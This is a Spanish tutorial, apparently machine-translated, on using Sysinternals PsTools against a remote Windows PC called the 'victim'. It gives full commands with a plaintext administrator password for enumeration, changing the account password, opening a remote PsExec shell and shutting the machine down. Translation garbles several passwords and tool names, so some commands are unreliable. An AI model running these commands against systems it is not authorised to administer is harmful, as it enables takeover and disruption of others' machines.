Enumeración remota de PC con Windows con PSTools

Por nhbgm

Enumeración remota de PC con Windows con PSTools. PSTools es un conjunto de 13 herramientas combinadas diseñadas y desarrolladas por Mark Russinovich. Todas estas herramientas se basan en la ejecución de la línea de comandos de los comandos de aplicaciones y procesos en un dispositivo remoto y redirigen la salida de las aplicaciones de la consola al sistema local para que las aplicaciones parezcan estar ejecutándose localmente.

Estas herramientas son especiales en su tipo y son compatibles con todas las versiones del sistema operativo Windows posteriores a Windows NT. Como se trata de herramientas de comando de consola, estas herramientas también pueden funcionar tanto en la computadora local como en el host remoto. No requiere ninguna instalación manual de software en el sistema remoto para ejecutar estas herramientas, y le permiten especificar credenciales alternativas para acceder al sistema remoto. Todas las herramientas están atadas usando el PD palabra clave antes de todas las herramientas. El prefijo «Ps» en PsList se relaciona con el hecho de que la herramienta de línea de comando de listado de procesos UNIX estándar se llama «ps», por lo que este prefijo se ha adoptado para todas las herramientas con el fin de combinarlas en un conjunto de herramientas llamado PsTools.

Enumeración remota de PC con Windows con PsTools

Descargue el kit de herramientas de PS desde https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

PSTools contiene las siguientes herramientas en un solo kit:

  • PsExec – utilizado para ejecutar procesos de forma remota
  • PsFile – para mostrar los archivos abiertos de forma remota
  • PsGetSid – muestra el SID de una computadora o un usuario
  • PsInfo – enumera información sobre un sistema
  • PsPing – mide el rendimiento de la red
  • PsKill – mata procesos por nombre o ID de proceso
  • PsLista – enumera información detallada sobre los procesos
  • PsLoggedOn – ver quién ha iniciado sesión localmente y mediante el uso compartido de recursos (se incluye la fuente completa)
  • PsLogList – vuelca registros de registro de eventos
  • PsContraseña – cambia las contraseñas de las cuentas
  • PsServicio – ver y controlar los servicios
  • PsShutdown – apaga y, opcionalmente, reinicia una computadora
  • pssuspender – suspende procesos

Pasemos a cómo usar PsTools a través del símbolo del sistema.

En primer lugar, abra el kit PSTool y, para hacerlo, abra el símbolo del sistema y abra el kit PSTool con el comando cd.

Nota: Si ve un cuadro de diálogo como el que se muestra a continuación, haga clic siempre en ACEPTAR para ejecutar o de lo contrario los comandos anteriores no funcionarán.

Enumeración remota de PC con Windows con PsTools

Obtener SID

  • Una vez que ejecute el kit PSTool, ejecute directorio comando para que pueda ver la lista de todas las herramientas.
  • Ahora, ejecutamos un comando que nos ayudará a usar la herramienta PSGetsid en el kit de herramientas. El comando es:

PSGetsidc64.exe \\192.168.1.104 -u administrador -p Ignite@123

192.168.1.104 –> IP de nuestra víctima

-u –> denota nombre de usuario

Administrador –> nombre de usuario

-p –> denota contraseña

Encender@123 –> contraseña

Información del sistema

  • Utilizará estos comandos para ejecutar la información del sistema de la PC remota.
  • A continuación, aprenderemos sobre la herramienta psinfo.exe que nos brinda toda la información necesaria de la PC remota. Para hacer que esta herramienta funcione, escriba:

psinfo.exe \\192.168.1.104 -u administrador -p Ignite@123

Compartir carpeta

Esto compartirá la carpeta de la PC remota.

  • En el futuro, ahora haremos que la herramienta psfile funcione escribiendo el siguiente comando:

psfile64.exe \\192.168.1.104 -u administrador -p Ignite@123

Información del proceso

La ejecución de este comando ayudará a ver todos los archivos y directorios que están abiertos de forma remota en la PC de la víctima.

  • Veremos esta herramienta pslist y para que funcione usando el siguiente comando:

pslist64.exe \\192.168.1.104 -u administrador -p Ignite@123

Servicios

Psservice.exe que nos permite conocer todos los servicios en ejecución en la PC de nuestras víctimas. El comando es:

PsService64.exe \\192.168.1.104 -u administrador -p Ignite@123

Lista de registro

Esta herramienta Psloglist.exe nos ayuda a ver los registros de la PC víctima. Para hacerlo, ejecute el siguiente comando.

psloglist.exe \\192.168.1.104 -u administrador -p Ignite@123

Cambia la contraseña

Pspasswd64.exe es la herramienta más importante ya que nos permite cambiar la contraseña de una PC. Para hacerlo, usa el comando:

pspasswd64.exe \\192.168.1.104 -u administrador -p ignite@123 administrador para siempre

Aquí,

192.168.1.104 –> IP de nuestra víctima

-u –> denota nombre de usuario

Administrador –> nombre de usuario

-p –> denota contraseña

Encender@123 –> contraseña

Administrador –-> nombre de usuario (especifique un usuario para cambiar)

Carcasa de conexión remota

PsExec64.exe es otra herramienta importante que nos lleva directamente al shell de la PC de la víctima. Su comando es:

PsExec64.exe \\192.168.1.104 -u administrador -p siempre cmd

Apagar

Por fin, esta herramienta Psshutdown nos ayuda a apagar la PC remota. Sólo tipo:

psshutdown.exe \\192.168.1.104 -u administrador -p para siempre

Tomará 20 segundos apagar la PC después de ejecutar el comando.

Entonces, estas eran herramientas en el kit PSTool y los comandos para ejecutarlas. Estas herramientas realmente facilitan mucho nuestro trabajo y son muy útiles. Eso es todo Enumeración remota de PC con Windows con PSTools.